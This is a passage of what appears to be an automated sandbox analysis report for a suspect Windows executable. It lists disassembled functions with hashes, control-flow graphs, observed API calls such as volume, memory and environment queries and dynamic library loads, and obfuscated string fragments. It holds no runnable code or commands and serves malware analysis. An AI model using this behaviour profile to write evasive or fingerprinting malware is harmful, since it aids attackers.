                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                  • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                                                  • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                  • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B11740 Relevance: .4, Instructions: 389COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2d54f7515e7dd989ac1e0d5b48bcfbee74737fe9cad61f34b3efa92111645c92
                                                  • Instruction ID: e7140aef428dbf34df6a4cf92fea584527bc48c12083a696d27db67f62b208f0
                                                  • Opcode Fuzzy Hash: 2d54f7515e7dd989ac1e0d5b48bcfbee74737fe9cad61f34b3efa92111645c92
                                                  • Instruction Fuzzy Hash: 55C1DDB1A083018FD714CF18C8907ABB7E1EF94354F98896DFA9597341E738D985CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B06EA6 Relevance: .3, Instructions: 326COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb3949d4d2da92276097e35eef5fb5d9d967a8944f7ba799fd0019870238314d
                                                  • Instruction ID: 74bf57d20d2cce4ad8dec702470589f9f8ffc41f2ba8d05d4e3382d648aa384b
                                                  • Opcode Fuzzy Hash: fb3949d4d2da92276097e35eef5fb5d9d967a8944f7ba799fd0019870238314d
                                                  • Instruction Fuzzy Hash: 7AC101B1914B018BD729CF24C4A4667BBF2FF49304F044A5DE9A74BAA1E774F50A8B84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B21DE0 Relevance: .2, Instructions: 248COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4b0fd97035ed7313dade587c1944620b1112f339be64e595aeafb66b2fc32eb
                                                  • Instruction ID: 890b71521e7f0d3dcd2e1872d1ea80a9aea881b087517d904e918c3126bc149b
                                                  • Opcode Fuzzy Hash: e4b0fd97035ed7313dade587c1944620b1112f339be64e595aeafb66b2fc32eb
                                                  • Instruction Fuzzy Hash: 5881EB71208311ABD314DF28E880B2FBBE1FB88754F504A5CF98897291DB75DA46CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0601F Relevance: .2, Instructions: 170COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2314fc97ecdc926c11370dcfc862b493785d62808d148a407bf1e641d6b3bc9b
                                                  • Instruction ID: 211438ad11a17ce54703e03e3c5ae089d8ee2c791ac31c69b51ec3daf935be4b
                                                  • Opcode Fuzzy Hash: 2314fc97ecdc926c11370dcfc862b493785d62808d148a407bf1e641d6b3bc9b
                                                  • Instruction Fuzzy Hash: 2341D2B59082108BD725CF24D88173BB7E5FF89354F185A6DE495DB392EB349C01CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B263FF Relevance: .1, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4501119bdc6a1d2b00fa727066dd6c8ac3585becf334a4c304936a4b4265193
                                                  • Instruction ID: 76463f4731fa8412ef58c2c5e129d3be2be338ec6cfd6ce75e0e4a91768851cc
                                                  • Opcode Fuzzy Hash: a4501119bdc6a1d2b00fa727066dd6c8ac3585becf334a4c304936a4b4265193
                                                  • Instruction Fuzzy Hash: AC216970248341ABE310DF14D984B2BB7E2FBC5B04F20896CE5D89B381CBB5EC058B96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B262F2 Relevance: .1, Instructions: 77COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6e7d84bafe4f33f736491ccc0f776f880048b6aa9be24e9beef72e88fbce3ffb
                                                  • Instruction ID: 152ddf81e48c336f0bcd02db134041096e8222259e7a6a479d3dd7eefb253b80
                                                  • Opcode Fuzzy Hash: 6e7d84bafe4f33f736491ccc0f776f880048b6aa9be24e9beef72e88fbce3ffb
                                                  • Instruction Fuzzy Hash: 59219D71208341ABD718CF18D950B2EB7E2FBC5708F64895CE18997241DB74ED15DB86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B05340 Relevance: .0, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ad0db6281905d3086da567e140d5bc532828e32f1808a1a67eef7543dc88a78
                                                  • Instruction ID: e9b5595db8cfd995dcd8990dbbb4b714b30a4efdf3f7393381169caffaa10836
                                                  • Opcode Fuzzy Hash: 4ad0db6281905d3086da567e140d5bc532828e32f1808a1a67eef7543dc88a78
                                                  • Instruction Fuzzy Hash: AAC08C649040414B8A18DF04AC5287272B86A07248B403038E607D3213CE10D002864A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0DEB0 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 157COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 71 b0deb0-b0df71 72 b0dfc2-b0e002 RtlExpandEnvironmentStrings 71->72 73 b0df73 71->73 75 b0e004-b0e009 72->75 76 b0e00b 72->76 74 b0df80-b0dfc0 73->74 74->72 74->74 77 b0e00e-b0e081 call af8840 RtlExpandEnvironmentStrings 75->77 76->77 80 b0e083 77->80 81 b0e0c4-b0e0d1 call b082e0 77->81 82 b0e090-b0e0c2 80->82 84 b0e0d6-b0e0d9 81->84 82->81 82->82
                                                  APIs
                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00B0DFF6
                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00B0E025
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings
                                                  • String ID: :9$B-H+$E1D?$G5^3$U!^/$U=A;$X%J#$z)V7
                                                  • API String ID: 237503144-3391977473
                                                  • Opcode ID: 47719c712b5e2505165307fa8af5caf86d26628e78836da642d77e34886f4cd3
                                                  • Instruction ID: f5a54e89c4c5cc25a26b2c4c010654b294313df393d91a985d2c573fe8c4bcca
                                                  • Opcode Fuzzy Hash: 47719c712b5e2505165307fa8af5caf86d26628e78836da642d77e34886f4cd3
                                                  • Instruction Fuzzy Hash: 855184B1108341ABD314CF10D890B5FBBE2BFC5394F508A1CF8E99B295DBB4D9498B86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0D460 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 460 b0d460-b0d4e7 461 b0d526-b0d569 RtlExpandEnvironmentStrings 460->461 462 b0d4e9 460->462 464 b0d572 461->464 465 b0d56b-b0d570 461->465 463 b0d4f0-b0d524 462->463 463->461 463->463 466 b0d575-b0d607 call af8840 RtlExpandEnvironmentStrings 464->466 465->466 469 b0d609 466->469 470 b0d65b-b0d688 466->470 471 b0d610-b0d659 469->471 472 b0d691-b0d693 470->472 473 b0d68a-b0d68f 470->473 471->470 471->471 474 b0d696-b0d6ab call af8840 472->474 473->474 477 b0d6d1-b0d6e1 474->477 478 b0d6ad-b0d6b2 474->478 480 b0d701-b0d70f call b28720 477->480 481 b0d6e3-b0d6ea 477->481 479 b0d6c0-b0d6cf 478->479 479->477 479->479 484 b0d714-b0d731 480->484 482 b0d6f0-b0d6ff 481->482 482->480 482->482
                                                  APIs
                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00B0D55D
                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00B0D588
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings
                                                  • String ID: uY.[$|}
                                                  • API String ID: 237503144-4164597068
                                                  • Opcode ID: ba53e3a53c60eae20de3ba3978bce63797b4481ae1d8914281b95bc9b09f0cc0
                                                  • Instruction ID: a37ed08f758576fd6759da94b32ef97aa4778bb4a8c51c361d7f50379ddc5be4
                                                  • Opcode Fuzzy Hash: ba53e3a53c60eae20de3ba3978bce63797b4481ae1d8914281b95bc9b09f0cc0
                                                  • Instruction Fuzzy Hash: 5E6178702083518FE724CF14C8A0BABBBE5EF86758F114A1CE8DA5B2C1D7749905CB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B21B85 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 485 b21b85-b21bee call b27b20 GetVolumeInformationW
                                                  APIs
                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00B21BD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: InformationVolume
                                                  • String ID: :$C$\
                                                  • API String ID: 2039140958-3809124531
                                                  • Opcode ID: 4adcd07ac3b4ec4d98c5e02a672cd855b38bfcf07b64299e2b49a115bdad0702
                                                  • Instruction ID: 172ea4e9e04aea231e7153cf9179b640aef24007b017e4a5cf83422db7f17c2e
                                                  • Opcode Fuzzy Hash: 4adcd07ac3b4ec4d98c5e02a672cd855b38bfcf07b64299e2b49a115bdad0702
                                                  • Instruction Fuzzy Hash: B2F08271298301B6E714CF10DC26F1F36E4AF40744F20581DF255AB2E0DBB4A608C79E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B25242 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 783 b25242-b252ac 784 b252e5-b252ea LoadLibraryW 783->784 785 b252ae-b252af 783->785 787 b252f1-b2530f 784->787 788 b252ec 784->788 786 b252b0-b252e3 785->786 786->784 786->786 788->787
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID: NA
                                                  • API String ID: 1029625771-788005234
                                                  • Opcode ID: 6b1dc5e2c816d6fc1c12f7a5159181352bf1505b68335a084ab144aa055faac2
                                                  • Instruction ID: 6d3ae255974a3cee41989b891824218c7b622d7a4766f7ab0d819dc02898305f
                                                  • Opcode Fuzzy Hash: 6b1dc5e2c816d6fc1c12f7a5159181352bf1505b68335a084ab144aa055faac2
                                                  • Instruction Fuzzy Hash: D52129B02146408FDB28CF25D8A4B277BF2EF45314F25859DD85A5FB8ADB38E544CB48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B25314 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 789 b25314-b2536b 790 b25390-b253a7 LoadLibraryW 789->790 791 b2536d-b2536f 789->791 792 b25370-b2538e 791->792 792->790 792->792
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID: AFG
                                                  • API String ID: 1029625771-345823793
                                                  • Opcode ID: 07276838912b4582c5b06453a9a3a7166d80bdeedb347edcf26608dbbf44446b
                                                  • Instruction ID: 2b5add16d5a53d29a8bbb34eb24c1926c8d279fa203bad2e318bfd48a8329454
                                                  • Opcode Fuzzy Hash: 07276838912b4582c5b06453a9a3a7166d80bdeedb347edcf26608dbbf44446b
                                                  • Instruction Fuzzy Hash: 3F01C5B4100A42AFD319CF16D4A4B26FBB1FB46314F20DA0DC46A17A45C778F565CF88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF8EC0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  Strings
                                                  • in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified, xrefs: 00AF8EF5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified
                                                  • API String ID: 0-4175449110
                                                  • Opcode ID: 465de663d8134b797e23c71964b5affde3839707134303c4332dabbdd2490fef
                                                  • Instruction ID: c1e6f7707dedd51131e294b19a08c28ac447b76ac757ee23bfdc0316bc9ac19d
                                                  • Opcode Fuzzy Hash: 465de663d8134b797e23c71964b5affde3839707134303c4332dabbdd2490fef
                                                  • Instruction Fuzzy Hash: 9AF082B08186188ECA607BF8EB0727E7AEAAF61310F110565FA8553152EF3C944A47A3
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B082E0 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 841 b082e0-b082f4 842 b08300-b08309 841->842 842->842 843 b0830b-b08326 RtlExpandEnvironmentStrings 842->843 844 b08328-b0832d 843->844 845 b0832f 843->845 846 b08332-b08354 call af8840 RtlExpandEnvironmentStrings call b28720 844->846 845->846 850 b08359-b08375 846->850
                                                  APIs
                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00B0831A
                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00B08348
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings
                                                  • String ID:
                                                  • API String ID: 237503144-0
                                                  • Opcode ID: 3ceb9845b43e7c42a7f64ae2e3e017ad56bacb068325c47f1c3b6eafc6c1472f
                                                  • Instruction ID: ceb73308061df4aebacf08bc784cb4df02060c51dbbfc1847aec74cca356fa1a
                                                  • Opcode Fuzzy Hash: 3ceb9845b43e7c42a7f64ae2e3e017ad56bacb068325c47f1c3b6eafc6c1472f
                                                  • Instruction Fuzzy Hash: AC01D2715006047BD6209B25DC8AF7777ACEB85B65F504618FA658B2D1DF30B90486B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B15D6F Relevance: 1.8, APIs: 1, Instructions: 340COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00B1607F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: InstalledMemoryPhysicallySystem
                                                  • String ID:
